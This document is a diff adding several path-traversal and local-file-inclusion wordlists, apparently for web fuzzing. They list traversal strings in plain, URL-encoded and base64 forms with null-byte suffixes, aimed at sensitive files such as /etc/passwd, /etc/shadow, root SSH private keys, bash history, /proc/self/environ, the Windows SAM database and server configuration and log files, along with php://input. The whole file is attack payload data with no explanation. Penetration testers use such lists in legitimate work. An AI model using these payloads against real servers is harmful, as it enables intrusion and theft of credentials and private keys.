/var/log/auth.log
|
||||
/var/log/boot.log
|
||||
/var/log/cron.log
|
||||
/var/log/dmesg
|
||||
/var/log/error_log
|
||||
/var/log/error.log
|
||||
../../../../../../../var/log/error_log
|
||||
../../../../../../../var/log/error.log
|
||||
../../../../../var/log/error_log
|
||||
/var/log/exim_mainlog
|
||||
/var/log/exim/mainlog
|
||||
/var/log/exim_paniclog
|
||||
/var/log/exim/paniclog
|
||||
/var/log/exim_rejectlog
|
||||
/var/log/exim/rejectlog
|
||||
/var/log/ftplog
|
||||
/var/log/ftp-proxy
|
||||
/var/log/ftp-proxy/ftp-proxy.log
|
||||
/var/log/httpd/
|
||||
/var/log/httpd/access_log
|
||||
/var/log/httpd/access.log
|
||||
../../../../../var/log/httpd/access_log
|
||||
/var/log/httpd/error_log
|
||||
/var/log/httpd/error.log
|
||||
../../../../../var/log/httpd/error_log
|
||||
/var/log/httpsd/ssl.access_log
|
||||
/var/log/httpsd/ssl_log
|
||||
/var/log/kern.log
|
||||
/var/log/lastlog
|
||||
/var/log/lighttpd
|
||||
/var/log/maillog
|
||||
/var/log/message
|
||||
/var/log/messages
|
||||
/var/log/mysqlderror.log
|
||||
/var/log/mysqld.log
|
||||
/var/log/mysql.log
|
||||
/var/log/mysql/mysql-bin.log
|
||||
/var/log/mysql/mysql.log
|
||||
/var/log/mysql/mysql-slow.log
|
||||
/var/log/ncftpd.errs
|
||||
/var/log/ncftpd/misclog.txt
|
||||
/var/log/news
|
||||
/var/log/news.all
|
||||
/var/log/news/news
|
||||
/var/log/news/news.all
|
||||
/var/log/news/news.crit
|
||||
/var/log/news/news.err
|
||||
/var/log/news/news.notice
|
||||
/var/log/news/suck.err
|
||||
/var/log/news/suck.notice
|
||||
/var/log/nginx/access_log
|
||||
/var/log/nginx/access.log
|
||||
../../../../../../../var/log/nginx/access_log
|
||||
../../../../../../../var/log/nginx/access.log
|
||||
../../../../../var/log/nginx/access_log
|
||||
../../../../../var/log/nginx/access.log
|
||||
/var/log/nginx/error_log
|
||||
/var/log/nginx/error.log
|
||||
../../../../../../../var/log/nginx/error_log
|
||||
../../../../../../../var/log/nginx/error.log
|
||||
../../../../../var/log/nginx/error_log
|
||||
../../../../../var/log/nginx/error.log
|
||||
/var/log/poplog
|
||||
/var/log/POPlog
|
||||
/var/log/proftpd
|
||||
/var/log/proftpd.access_log
|
||||
/var/log/proftpd.xferlog
|
||||
/var/log/proftpd/xferlog.legacy
|
||||
/var/log/pureftpd.log
|
||||
/var/log/pure-ftpd/pure-ftpd.log
|
||||
/var/log/qmail
|
||||
/var/log/qmail/
|
||||
/var/log/samba
|
||||
/var/log/samba-log.%m
|
||||
/var/log/secure
|
||||
/var/log/smtpd
|
||||
/var/log/spooler
|
||||
/var/log/syslog
|
||||
/var/log/telnetd
|
||||
/var/log/thttpd_log
|
||||
/var/log/utmp
|
||||
/var/log/vsftpd.log
|
||||
/var/log/wtmp
|
||||
/var/log/xferlog
|
||||
/var/log/yum.log
|
||||
/var/lp/logs/lpNet
|
||||
/var/lp/logs/lpsched
|
||||
/var/lp/logs/requests
|
||||
/var/mysql.log
|
||||
/var/run/httpd.pid
|
||||
/var/run/mysqld/mysqld.pid
|
||||
/var/run/utmp
|
||||
/var/saf/_log
|
||||
/var/saf/port/log
|
||||
/var/spool/errors
|
||||
/var/spool/locks
|
||||
/var/spool/logs
|
||||
/var/spool/tmp
|
||||
/var/www/conf/httpd.conf
|
||||
/var/www/html/.htaccess
|
||||
/var/www/localhost/htdocs/.htaccess
|
||||
/var/www/log/access_log
|
||||
/var/www/log/error_log
|
||||
/../../var/www/logs/access_log
|
||||
/var/www/logs/access_log
|
||||
/var/www/logs/access.log
|
||||
../../../../../../../var/www/logs/access_log
|
||||
../../../../../../../var/www/logs/access.log
|
||||
../../../../../var/www/logs/access.log
|
||||
/var/www/logs/error_log
|
||||
/var/www/logs/error.log
|
||||
../../../../../../../var/www/logs/error_log
|
||||
../../../../../../../var/www/logs/error.log
|
||||
../../../../../var/www/logs/error_log
|
||||
../../../../../var/www/logs/error.log
|
||||
/var/www/sitename/htdocs/
|
||||
/var/www/vhosts/sitename/httpdocs/.htaccess
|
||||
/var/www/web1/html/.htaccess
|
||||
/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf
|
||||
/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf
|
||||
/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf
|
||||
/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php
|
||||
/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php
|
||||
/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php
|
||||
/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini
|
||||
/Volumes/webBackup/opt/apache2/conf/httpd.conf
|
||||
/Volumes/webBackup/private/etc/httpd/httpd.conf
|
||||
/Volumes/webBackup/private/etc/httpd/httpd.conf.default
|
||||
/web/conf/php.ini
|
||||
/WINDOWS\php.ini
|
||||
../../windows/win.ini
|
||||
/WINNT\php.ini
|
||||
/..\..\..\..\..\..\winnt\win.ini
|
||||
/www/logs/proftpd.system.log
|
||||
/xampp\apache\bin\php.ini
|
||||
/.Xauthority
|
||||
..2fapache2flogs2ferror.log
|
||||
..2fapache2flogs2faccess.log
|
||||
..2f..2fapache2flogs2ferror.log
|
||||
..2f..2fapache2flogs2faccess.log
|
||||
..2f..2f..2fapache2flogs2ferror.log
|
||||
..2f..2f..2fapache2flogs2faccess.log
|
||||
..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2facces_log
|
||||
..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2facces.log
|
||||
..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2ferror_log
|
||||
..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2ferror.log
|
||||
..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2faccess_log
|
||||
..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2faccess.log
|
||||
..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2faccess_ log
|
||||
..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2faccess. log
|
||||
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2faccess_log
|
||||
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22faccess_log
|
||||
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2faccess.log
|
||||
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22faccess.log
|
||||
..2f..2f..2f..2f..2f..2f..2fvar2flog2faccess_log
|
||||
..2f..2f..2f..2f..2f..2f..2fvar2flog2faccess.log
|
||||
..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2ferror_log
|
||||
..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2ferror.log
|
||||
..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2ferror_l og
|
||||
..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2ferror.l og
|
||||
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2ferror_log
|
||||
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22ferror_log
|
||||
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2ferror.log
|
||||
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22ferror.log
|
||||
..2f..2f..2f..2f..2f..2f..2fvar2flog2ferror_log
|
||||
..2f..2f..2f..2f..2f..2f..2fvar2flog2ferror.log
|
||||
..2fetc2fpasswd
|
||||
..2fetc2fpasswd%00
|
||||
..2f..2fetc2fpasswd
|
||||
..2f..2fetc2fpasswd%00
|
||||
..2f..2f..2fetc2fpasswd
|
||||
..2f..2f..2fetc2fpasswd%00
|
||||
..2f..2f..2f..2fetc2fpasswd
|
||||
..2f..2f..2f..2fetc2fpasswd%00
|
||||
..2f..2f..2f..2f..2fetc2fpasswd
|
||||
..2f..2f..2f..2f..2fetc2fpasswd%00
|
||||
..2f..2f..2f..2f..2f..2fetc2fpasswd
|
||||
..2f..2f..2f..2f..2f..2fetc2fpasswd%00
|
||||
..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
|
||||
..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
|
||||
..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
|
||||
..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fshadow%00
|
||||
L2V0Yy9tYXN0ZXIucGFzc3dk
|
||||
L21hc3Rlci5wYXNzd2Q=
|
||||
ZXRjL3Bhc3N3ZA==
|
||||
ZXRjL3NoYWRvdyUwMA==
|
||||
L2V0Yy9wYXNzd2Q=
|
||||
L2V0Yy9wYXNzd2QlMDA=
|
||||
Li4vZXRjL3Bhc3N3ZA==
|
||||
Li4vZXRjL3Bhc3N3ZCUwMA==
|
||||
Li4vLi4vZXRjL3Bhc3N3ZA==
|
||||
Li4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||
Li4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||
Li4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||
Li4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||
Li4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||
Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3NoYWRvdyUwMA==
|
|
@ -0,0 +1,39 @@
|
|||
/proc/self/cmdline
|
||||
/proc/self/stat
|
||||
/proc/self/status
|
||||
/proc/self/fd/0
|
||||
/proc/self/fd/1
|
||||
/proc/self/fd/2
|
||||
/proc/self/fd/3
|
||||
/proc/self/fd/4
|
||||
/proc/self/fd/5
|
||||
/proc/self/fd/6
|
||||
/proc/self/fd/7
|
||||
/proc/self/fd/8
|
||||
/proc/self/fd/9
|
||||
/proc/self/fd/10
|
||||
/proc/self/fd/11
|
||||
/proc/self/fd/12
|
||||
/proc/self/fd/13
|
||||
/proc/self/fd/14
|
||||
/proc/self/fd/15
|
||||
/proc/self/fd/16
|
||||
/proc/self/fd/17
|
||||
/proc/self/fd/18
|
||||
/proc/self/fd/19
|
||||
/proc/self/fd/20
|
||||
/proc/self/fd/21
|
||||
/proc/self/fd/22
|
||||
/proc/self/fd/23
|
||||
/proc/self/fd/24
|
||||
/proc/self/fd/25
|
||||
/proc/self/fd/26
|
||||
/proc/self/fd/27
|
||||
/proc/self/fd/28
|
||||
/proc/self/fd/29
|
||||
/proc/self/fd/30
|
||||
/proc/self/fd/31
|
||||
/proc/self/fd/32
|
||||
/proc/self/fd/33
|
||||
/proc/self/fd/34
|
||||
/proc/self/fd/35
|
|
@ -0,0 +1,69 @@
|
|||
php://input
|
||||
C:\boot.ini
|
||||
C:\WINDOWS\win.ini
|
||||
C:\WINDOWS\php.ini
|
||||
C:\WINDOWS\System32\Config\SAM
|
||||
C:\WINNT\php.ini
|
||||
C:\xampp\phpMyAdmin\config.inc
|
||||
C:\xampp\phpMyAdmin\phpinfo.php
|
||||
C:\xampp\phpmyadmin\config.inc
|
||||
C:\xampp\phpmyadmin\phpinfo.php
|
||||
C:\xampp\phpmyadmin\config.inc.php
|
||||
C:\xampp\phpMyAdmin\config.inc.php
|
||||
C:\xampp\apache\conf\httpd.conf
|
||||
C:\xampp\FileZillaFTP\FileZilla Server.xml
|
||||
C:\xampp\MercuryMail\mercury.ini
|
||||
C:\mysql\bin\my.ini
|
||||
C:\xampp\php\php.ini
|
||||
C:\xampp\phpMyAdmin\config.inc.php
|
||||
C:\xampp\tomcat\conf\tomcat-users.xml
|
||||
C:\xampp\tomcat\conf\web.xml
|
||||
C:\xampp\sendmail\sendmail.ini
|
||||
C:\xampp\webalizer\webalizer.conf
|
||||
C:\xampp\webdav\webdav.txt
|
||||
C:\xampp\apache\logs\error.log
|
||||
C:\xampp\apache\logs\access.log
|
||||
C:\xampp\FileZillaFTP\Logs
|
||||
C:\xampp\FileZillaFTP\Logs\error.log
|
||||
C:\xampp\FileZillaFTP\Logs\access.log
|
||||
C:\xampp\MercuryMail\LOGS\error.log
|
||||
C:\xampp\MercuryMail\LOGS\access.log
|
||||
C:\xampp\mysql\data\mysql.err
|
||||
C:\xampp\sendmail\sendmail.log
|
||||
C:\apache\log\error.log
|
||||
C:\apache\log\access.log
|
||||
C:\apache\log\error_log
|
||||
C:\apache\log\access_log
|
||||
C:\apache2\log\error.log
|
||||
C:\apache2\log\access.log
|
||||
C:\apache2\log\error_log
|
||||
C:\apache2\log\access_log
|
||||
C:\log\error.log
|
||||
C:\log\access.log
|
||||
C:\log\error_log
|
||||
C:\log\access_log
|
||||
C:\apache\logs\error.log
|
||||
C:\apache\logs\access.log
|
||||
C:\apache\logs\error_log
|
||||
C:\apache\logs\access_log
|
||||
C:\apache2\logs\error.log
|
||||
C:\apache2\logs\access.log
|
||||
C:\apache2\logs\error_log
|
||||
C:\apache2\logs\access_log
|
||||
C:\logs\error.log
|
||||
C:\logs\access.log
|
||||
C:\logs\error_log
|
||||
C:\logs\access_log
|
||||
C:\log\httpd\access_log
|
||||
C:\log\httpd\error_log
|
||||
C:\logs\httpd\access_log
|
||||
C:\logs\httpd\error_log
|
||||
C:\opt\xampp\logs\access_log
|
||||
C:\opt\xampp\logs\error_log
|
||||
C:\opt\xampp\logs\access.log
|
||||
C:\opt\xampp\logs\error.log
|
||||
C:\Program Files\Apache Group\Apache\logs\access.log
|
||||
C:\Program Files\Apache Group\Apache\logs\error.log
|
||||
C:\Program Files\Apache Group\Apache\conf\httpd.conf
|
||||
C:\Program Files\Apache Group\Apache2\conf\httpd.conf
|
||||
C:\Program Files\xampp\apache\conf\httpd.conf
|
|
@ -0,0 +1,62 @@
|
|||
/etc/passwd
|
||||
/etc/group
|
||||
/etc/hosts
|
||||
/etc/motd
|
||||
/etc/issue
|
||||
/etc/bashrc
|
||||
/etc/apache2/apache2.conf
|
||||
/etc/apache2/ports.conf
|
||||
/etc/apache2/sites-available/default
|
||||
/etc/httpd/conf/httpd.conf
|
||||
/etc/httpd/conf.d
|
||||
/etc/httpd/logs/access.log
|
||||
/etc/httpd/logs/access_log
|
||||
/etc/httpd/logs/error.log
|
||||
/etc/httpd/logs/error_log
|
||||
/etc/init.d/apache2
|
||||
/etc/mysql/my.cnf
|
||||
/etc/nginx.conf
|
||||
/opt/lampp/logs/access_log
|
||||
/opt/lampp/logs/error_log
|
||||
/opt/lamp/log/access_log
|
||||
/opt/lamp/logs/error_log
|
||||
/proc/self/environ
|
||||
/proc/version
|
||||
/proc/cmdline
|
||||
/proc/mounts
|
||||
/proc/config.gz
|
||||
/root/.bashrc
|
||||
/root/.bash_history
|
||||
/root/.ssh/authorized_keys
|
||||
/root/.ssh/id_rsa
|
||||
/root/.ssh/id_rsa.keystore
|
||||
/root/.ssh/id_rsa.pub
|
||||
/root/.ssh/known_hosts
|
||||
/usr/local/apache/htdocs/index.html
|
||||
/usr/local/apache/conf/httpd.conf
|
||||
/usr/local/apache/conf/extra/httpd-ssl.conf
|
||||
/usr/local/apache/logs/error_log
|
||||
/usr/local/apache/logs/access_log
|
||||
/usr/local/apache/bin/apachectl
|
||||
/usr/local/apache2/htdocs/index.html
|
||||
/usr/local/apache2/conf/httpd.conf
|
||||
/usr/local/apache2/conf/extra/httpd-ssl.conf
|
||||
/usr/local/apache2/logs/error_log
|
||||
/usr/local/apache2/logs/access_log
|
||||
/usr/local/apache2/bin/apachectl
|
||||
/usr/local/etc/nginx/nginx.conf
|
||||
/usr/local/nginx/conf/nginx.conf
|
||||
/var/apache/logs/access_log
|
||||
/var/apache/logs/access.log
|
||||
/var/apache/logs/error_log
|
||||
/var/apache/logs/error.log
|
||||
/var/log/apache/access.log
|
||||
/var/log/apache/access_log
|
||||
/var/log/apache/error.log
|
||||
/var/log/apache/error_log
|
||||
/var/log/httpd/error_log
|
||||
/var/log/httpd/access_log
|
||||
/var/log/nginx/access_log
|
||||
/var/log/nginx/access.log
|
||||
/var/log/nginx/error_log
|
||||
/var/log/nginx/error.log
|
|
@ -0,0 +1,911 @@
|
|||
\apache2\log\access_log
|
||||
\apache2\log\access.log
|
||||
\apache2\log\error_log
|
||||
\apache2\log\error.log
|
||||
/apache2/logs/access.log
|
||||
/apache2/logs/access.log
|
||||
\apache2\logs\access_log
|
||||
\apache2\logs\access.log
|
||||
/apache2/logs/access.log%00
|
||||
/apache2/logs/error.log
|
||||
/apache2/logs/error.log
|
||||
\apache2\logs\error_log
|
||||
\apache2\logs\error.log
|
||||
/apache2/logs/error.log%00
|
||||
\apache\log\access_log
|
||||
\apache\log\access.log
|
||||
\apache\log\error_log
|
||||
\apache\log\error.log
|
||||
/apache/logs/access.log
|
||||
/apache/logs/access.log
|
||||
/apache/logs/access.log
|
||||
\apache\logs\access_log
|
||||
\apache\logs\access.log
|
||||
/apache/logs/access.log%00
|
||||
/apache/logs/error.log
|
||||
/apache/logs/error.log
|
||||
/apache/logs/error.log
|
||||
\apache\logs\error_log
|
||||
\apache\logs\error.log
|
||||
/apache/logs/error.log%00
|
||||
/apache\php\php.ini
|
||||
/apache\php\php.ini
|
||||
/apache\php\php.ini%00
|
||||
/bin/php.ini
|
||||
/bin/php.ini
|
||||
/bin/php.ini%00
|
||||
c:\apache\php\php.ini
|
||||
C:\apache\php\php.ini
|
||||
C:\boot.ini
|
||||
c:\home2\bin\stable\apache\php.ini
|
||||
C:\home2\bin\stable\apache\php.ini
|
||||
c:\home\bin\stable\apache\php.ini
|
||||
C:\home\bin\stable\apache\php.ini
|
||||
C:\MySQL\data\hostname.err
|
||||
C:\MySQL\data\mysql-bin.log
|
||||
C:\MySQL\data\mysql.err
|
||||
C:\MySQL\data\mysql.log
|
||||
C:\MySQL\my.cnf
|
||||
C:\MySQL\my.ini
|
||||
c:\NetServer\bin\stable\apache\php.ini
|
||||
c:\php4\php.ini
|
||||
C:\php4\php.ini
|
||||
C:\php4\sessions\
|
||||
c:\php5\php.ini
|
||||
C:\php5\php.ini
|
||||
C:\php5\sessions\
|
||||
c:\php\php.ini
|
||||
c:\PHP\php.ini
|
||||
C:\php\php.ini
|
||||
C:\php\sessions\
|
||||
C:\ProgramFiles\ApacheGroup\Apache2\conf\httpd.conf
|
||||
C:\ProgramFiles\ApacheGroup\Apache\conf\httpd.conf
|
||||
C:\ProgramFiles\ApacheGroup\Apache\logs\access.log
|
||||
C:\ProgramFiles\ApacheGroup\Apache\logs\error.log
|
||||
C:\ProgramFiles\MySQL\data\hostname.err
|
||||
C:\ProgramFiles\MySQL\data\mysql-bin.log
|
||||
C:\ProgramFiles\MySQL\data\mysql.err
|
||||
C:\ProgramFiles\MySQL\data\mysql.log
|
||||
C:\ProgramFiles\MySQL\my.cnf
|
||||
C:\ProgramFiles\MySQL\my.ini
|
||||
C:\ProgramFiles\MySQL\MySQLServer5.0\data\hostname.err
|
||||
C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql-bin.log
|
||||
C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.err
|
||||
C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.log
|
||||
C:\ProgramFiles\MySQL\MySQLServer5.0\my.cnf
|
||||
C:\ProgramFiles\MySQL\MySQLServer5.0\my.ini
|
||||
C:\ProgramFiles\xampp\apache\conf\httpd.conf
|
||||
c:\WINDOWS\php.ini
|
||||
C:\WINDOWS\php.ini
|
||||
C:\WINDOWS\Repair\SAM
|
||||
C:\WINDOWS\TEMP\
|
||||
C:\WINDOWS\win.ini
|
||||
c:\WINNT\php.ini
|
||||
C:\WINNT\php.ini
|
||||
C:\WINNT\win.ini
|
||||
c:\xampp\apache\bin\php.ini
|
||||
C:\xampp\apache\bin\php.ini
|
||||
etc%2fpasswd
|
||||
etc%2fpasswd%00
|
||||
etc%5cpasswd
|
||||
etc%5cpasswd%00
|
||||
/etc/apache2/apache2.conf
|
||||
/etc/apache2.conf
|
||||
/etc/apache2/conf/httpd.conf
|
||||
/etc/apache2/conf/httpd.conf
|
||||
/etc/apache2/conf/httpd.conf%00
|
||||
/etc/apache2/httpd.conf
|
||||
/etc/apache2/httpd.conf
|
||||
/etc/apache2/httpd.conf%00
|
||||
/etc/apache2/sites-available/default
|
||||
/etc/apache2/sites-enabled/000-default
|
||||
/etc/apache/apache.conf
|
||||
/etc/apache/conf/httpd.conf
|
||||
/etc/apache/conf/httpd.conf
|
||||
/etc/apache/conf/httpd.conf%00
|
||||
/etc/apache/httpd.conf
|
||||
